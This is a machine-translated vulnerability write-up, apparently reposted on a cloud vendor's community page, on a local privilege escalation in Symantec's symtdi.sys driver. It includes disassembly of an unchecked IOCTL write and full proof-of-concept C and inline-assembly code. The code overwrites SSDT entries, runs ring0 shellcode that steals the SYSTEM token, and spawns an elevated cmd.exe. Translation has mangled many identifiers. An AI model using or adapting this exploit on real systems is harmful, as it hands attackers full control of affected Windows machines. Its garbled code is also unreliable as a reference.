Symantec AntiVirus symtdi. sys Driver Local Privilege Escalation Vulnerability

Source: Internet
Author: User
Tags ssdt
Affected Systems:
Symantec Norton AntiVirus 2006
Symantec Norton AntiVirus 2005
Symantec Norton Personal Firewall 2006
Symantec Norton Personal Firewall 2005
Symantec Norton AntiSpam 2005
Symantec Client Security 3.1
Symantec Client Security 3.0
Symantec Client Security 2.0
Symantec Client Security
Symantec Internet Security 2006
Symantec Internet Security 2005
Symantec Norton System Works 2006
Symantec Norton System Works 2005
Symantec AntiVirus premiate edition 9.x
Symantec AntiVirus premiate edition 10.1
Symantec AntiVirus premiate edition 10.0

A vulnerability of Symantec exists in symtdi. sys.
The irp_mj_device_control routine in the driver does not check the validity of the buffer address passed in by the user,
Attackers can exploit this vulnerability to write any kernel address. Users can send malicious deviceiocontrol to completely control computing.
Machine.

In symtdi. sys, run the following code to process the irp_mj_device_control request.

Loc_387c0:; Code xref: sub_38736 + 6C \ u0018j
. Text: 000387c0 CMP dword_4b258, 0
. Text: 000387c7 JZ short loc_387ef
. Text: 000387c7
. Text: 000387c9 call kegetcurrentirql
. Text: 000387c9
. Text: 000387ce and eax, 0ffh
. Text: 000387d3 test eax, eax
. Text: 000387d5 jnz short loc_387ef
. Text: 000387d5
. Text: 000387d7 call sub_37b5f
. Text: 000387d7
. Text: 000387dc test eax, eax
. Text: 000387de JZ short loc_387ef
. Text: 000387de
. Text: 000387e0 mov dword_4b258, 0
. Text: 000387ea call sub_37b9a
. Text: 000387ea
. Text: 000387ef
. Text: 000387ef loc_387ef:; Code xref: sub_38736 + 91 \ u0018j
. Text: 000387ef; sub_38736 + 9f \ u0018j
. Text: 000387ef; sub_38736 + A8 \ u0018j
. Text: 000387ef mov ECx, [EBP + var_20]
. Text: 000387f2 mov edX, [ECx + 0ch]
. Text: 000387f5 mov [EBP + var_38], EDX
. Text: 000387f8 mov eax, [EBP + var_38]
. Text: 000387fb SHR eax, 10 h
. Text: 000387fe mov [EBP + var_44], eax
. Text: 00038801 CMP [EBP + var_44], 8302 H
. Text: 00038808 jnz loc_3983c
. Text: 00038808
. Text: 0003880e CMP [EBP + var_38], 83022227 H
. Text: 00038815 JNB short loc_38854
. Text: 00038815
. Text: 00038817 CMP dword_4b0dc, 0
. Text: 0003881e jnz short loc_38842
. Text: 0003881e
. Text: 00038820 call DS: keentercriticalregion
. Text: 00038826 mov ECx, offset stru_4b060; fastmutex
. Text: 0003882b call DS: exacquirefastmutexunsafe
. Text: 00038831 mov ECx, offset stru_4b060; fastmutex
. Text: 00038836 call DS: exreleasefastmutexunsafe
. Text: 0003883c call DS: keleavecriticalregion
. Text: 0003883c
. Text: 00038842
. Text: 00038842 loc_38842:; Code xref: sub_38736 + E8 \ u0018j
. Text: 00038842 CMP dword_4b258, 0
. Text: 00038849 jnz short loc_38854
. Text: 00038849
. Text: 0003884b mov ECx, [EBP + var_38]
. Text: 0003884e push ECx
. Text: 0003884f call sub_16e17
. Text: 0003884f
. Text: 00038854
. Text: 00038854 loc_38854:; Code xref: sub_38736 + DF \ u0018j
. Text: 00038854; sub_38736 + 113 \ u0018j

The following processes controlcode, which is basically defined as method_neither.

. Text: 00038854 mov edX, [EBP + var_38]; edX = controlcode
. Text: 00038857 mov [EBP + var_f0], EDX
. Text: 0003885d CMP [EBP + var_f0], 830221e7h
. Text: 00038867 ja loc_38985; jump if conrolcode> 830221e7h
. Text: 00038867
. Text: 0003886d CMP [EBP + var_f0], 830221e7h
. Text: 00038877 JZ loc_38f5e
. Text: 00038877
. Text: 0003887d CMP [EBP + var_f0], 830221bfh
. Text: 00038887 ja loc_38952
. Text: 00038887
. Text: 0003888d CMP [EBP + var_f0], 830221bfh
. Text: 00038897 JZ loc_38c2c
. Text: 00038897
. Text: 0003889d CMP [EBP + var_f0], 830221a7h
. Text: 000388a7 ja short loc_3891f
. Text: 000388a7
. Text: 000388a9 CMP [EBP + var_f0], 830221a7h
. Text: 000388b3 JZ loc_38bb0
. Text: 000388b3
. Text: 000388b9 CMP [EBP + var_f0], 8302219ah
. Text: 000388c3 ja short loc_388fa
. Text: 000388c3
. Text: 000388c5 CMP [EBP + var_f0], 8302219ah
. Text: 000388cf JZ loc_38e15
. Text: 000388cf
. Text: 000388d5 CMP [EBP + var_f0], 83022003 H
. Text: 000388df JZ loc_38b49; note the following:
. Text: 000388df
. Text: 000388e5 CMP [EBP + var_f0], 83022196 H
. Text: 000388ef JZ loc_38dd5
. Text: 000388ef
. Text: 000388f5 JMP loc_392ee

Many of its control codes have problems. Of course, the best control code to use is 83022003 H. Let's take a look.
How to handle 83022003 h in symtdi. sys

Loc_38b49:; Code xref: sub_38736 + 1a9 \ u0018j
. Text: 00038b49 mov ECx, [EBP + IRP]
. Text: 00038b4c mov edX, [ECx + 3ch]; edX = IRP-> userbuffer
. Text: 00038b4f mov [EBP + var_24], EDX
. Text: 00038b52 mov eax, [EBP + var_20]
. Text: 00038b55 mov ECx, [eax + 4]
. Text: 00038b58 mov [EBP + var_40], ECx
. Text: 00038b5b mov edX, [EBP + var_40]
. Text: 00038b5e push edX
. Text: 00038b5f mov eax, [EBP + var_24]
. Text: 00038b62 push eax
. Text: 00038b63 call sub_3b7b0

Sub_3b7b0 proc near; Code xref: sub_38736 + 42D \ u0018p
. Text: 0003b7b0
. Text: 0003b7b0 var_4 = dword ptr-4
. Text: 0003b7b0 arg_0 = dword ptr 8
. Text: 0003b7b0 arg_4 = dword ptr 0ch
. Text: 0003b7b0
. Text: 0003b7b0 push EBP
. Text: 0003b7b1 mov EBP, ESP
. Text: 0003b7b3 push ECx
. Text: 0003b7b4 mov [EBP + var_4], 0
. Text: 0003b7bb CMP [EBP + arg_0], 0
. Text: 0003b7bf JZ short loc_3b7eb
. Text: 0003b7bf
. Text: 0003b7c1 CMP [EBP + arg_4], 9
. Text: 0003b7c5 JB short loc_3b7eb
. Text: 0003b7c5
. Text: 0003b7c7 mov eax, [EBP + arg_0]

; Eax = IRP-> userbuffer has not checked IRP-> userbuffer before

. Text: 0003b7ca mov ECx, dword_45544
. Text: 0003b7d0 mov [eax], ECx

The following is a write operation on userbuffer, with a total of 9 bytes written, forming a writable kernel address vulnerability.

. Text: 0003b7d2 mov edX, dword_45548
. Text: 0003b7d8 mov [eax + 4], EDX
. Text: 0003b7db mov Cl, byte_4554c
. Text: 0003b7e1 mov [eax + 8], Cl
. Text: 0003b7e4 mov [EBP + var_4], 9
. Text: 0003b7e4
. Text: 0003b7eb
. Text: 0003b7eb loc_3b7eb:; Code xref: sub_3b7b0 + f \ u0018j
. Text: 0003b7eb; sub_3b7b0 + 15 \ u0018j
. Text: 0003b7eb mov eax, [EBP + var_4]
. Text: 0003b7ee mov ESP, EBP
. Text: 0003b7f0 pop EBP
. Text: 0003b7f1 retn 8
. Text: 0003b7f1
. Text: 0003b7f1 sub_3b7b0 endp

After reading the code, we all know exactly how to exploit this vulnerability. We can hook a letter on ssdt.
Number. When we call the function to be hooked, we have the opportunity to run our ring0 code.
Select ntvdmcontrol. Although nine bytes of data are covered here, a function after ntvdmcontrol
It is not a commonly used API, so our exploit can ensure the efficiency of % 80 or above, but we must call ring 0
Perform some on-site recovery during code, otherwise it will be ugly to die.

PoC code:

# Include <stdio. h>
# Include <windows. h>

# Pragma comment (Lib, "NTDLL. lib ")

Typedef long ntstatus;

# Define STATUS_SUCCESS (ntstatus) 0x000000000000l)
# Define status_info_length_mismatch (ntstatus) 0xc0000004l)

Typedef struct _ image_fixup_entry {

Word offset: 12;
Word type: 4;
} Image_fixup_entry, * pimage_fixup_entry;

Typedef struct _ unicode_string {

Ushort length;
Ushort maximumlength;
Pwstr buffer;
} Unicode_string, * punicode_string;

Extern "C"
Ntstatus
Ntapi
Ntallocatevirtualmemory (
In handle processhandle,
In out pvoid * baseaddress,
In ulong zerobits,
In out Pulong allocationsize,
In ulong allocationtype,
In ulong protect
);

Int main (INT argc, char * argv [])
{
Ntstatus status;
Handle devicehandle;
DWORD dwreturnsize = 0;
Pvoid vdmcontrol = NULL;

Pvoid shellcodememory = (pvoid) 0x2e352e35;
DWORD memorysize = 0x2000;

Process_information PI;
Startupinfoa ststartup;

Osversioninfoex osversioninfo;

Rtlzeromemory (& osversioninfo, sizeof (osversioninfo ));
Osversioninfo. dwosversioninfosize = sizeof (osversioninfoex );
Getversionex (osversioninfo *) & osversioninfo );

If (osversioninfo. dwmajorversion! = 5 ){

Printf ("not nt5 System \ n ");
Exitprocess (0 );
Return 0;
}

If (osversioninfo. dwminorversion! = 2 ){

Printf ("isn' t Windows 2003 System \ n ");
Exitprocess (0 );
Return 0;
}

Printf ("Symantec Local Privilege Escalation Vulnerability Exploit (POC) \ n ");
Printf ("tested on: \ n \ twindows 2003 SP1 (ntkrnl.pa.exe version) \ n ");
Printf ("\ tcoded by shadow3 \ n ");

Status = ntallocatevirtualmemory (handle)-1,
& Shellcodememory,
0,
& Memorysize,
Mem_reserve | mem_commit | mem_top_down,
Page_execute_readwrite );
If (status! = STATUS_SUCCESS ){

Printf ("ntallocatevirtualmemory failed, status: % 08x \ n", status );
Return 0;
}

Memset (shellcodememory, 0x90, memorysize );

_ ASM {

Call copyshellcode

NOP
NOP
NOP
NOP
NOP
NOP

//
// Resume ssdt to ensure normal system operation
//
/*
MoV EDI, 0x80827d54
MoV [EDI], 0x808c998a
MoV [EDI + 4], 0x809ba123
MoV [EDI + 8], 0x80915cbe
* /// Ntoskrnl.exe

MoV EDI, 0x8083100c
// Mov [EDI], 0x808c998a
MoV [EDI + 4], 0x809970cc // ntkrnlpa.exe version
MoV [EDI + 8], 0x8092ff3e

MoV eax, 0xffdff124 // eax = ETHREAD (not 3G Mode)
MoV eax, [eax]

MoV ESI, [eax + 0x218]
MoV eax, ESI

Search2k3sp1:

MoV eax, [eax + 0x98]
Sub eax, 0x98
MoV edX, [eax + 0x94]
CMP edX, 0x4 // find system process
JNE search2k3sp1

MoV eax, [eax + 0xd8] // get the system process token
MoV [ESI + 0xd8], eax // modify the token of the current process

RET 8

Copyshellcode:

Pop ESI
Lea ECx, copyshellcode
Sub ECx, ESI

MoV EDI, 0x2e352e35
ClD
Rep movsb

}

Devicehandle = createfile ("\\\\. \\ symtdi ",
0,
File_pai_read | file_pai_write,
Null,
Open_existing,
0,
Null );
If (invalid_handle_value = devicehandle ){

Printf ("Open symtdi device failed, code: % d \ n", getlasterror ());
Return 0;
} Else {

Printf ("Open symtdi device success \ n ");
}

Deviceiocontrol (devicehandle,
0x83022003,
Null,
0,
(Pvoid) 0x8083100c, // ntkrnlpa.exe version // (pvoid) 0x80827d54,
0xc,
& Dwreturnsize,
Null );

Closehandle (devicehandle );

Vdmcontrol = getprocaddress (loadlibrary ("NTDLL. dll"), "zwvdmcontrol ");
If (vdmcontrol = NULL ){

Printf ("vdmcontrol = NULL \ n ");
Return 0;
}

Printf ("Call shellcode ...");

_ ASM {

XOR ECx, ECx
Push ECx
Push ECx
MoV eax, vdmcontrol
Call eax
}

Printf ("done. \ n ");
Printf ("Create New Process \ n ");

Getstartupinfo (& ststartup );

CreateProcess (null,
"Cmd.exe ",
Null,
Null,
True,
Null,
Null,
Null,
& Ststartup,
& PI );

Return 0;
}

I searched for symtdi. sys on the Internet and found that someone sent this vulnerability abroad in May.
The vulnerability is reported as a denial of service. However, the vendor estimates that the vulnerability is not fixed because of its low security level, I hope that the security vendors can report the mentality of responsible for users to fix the vulnerability as soon as possible, if you have any questions above, please send an email to the Polymorphours@gmail.com to contact me, thank you.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.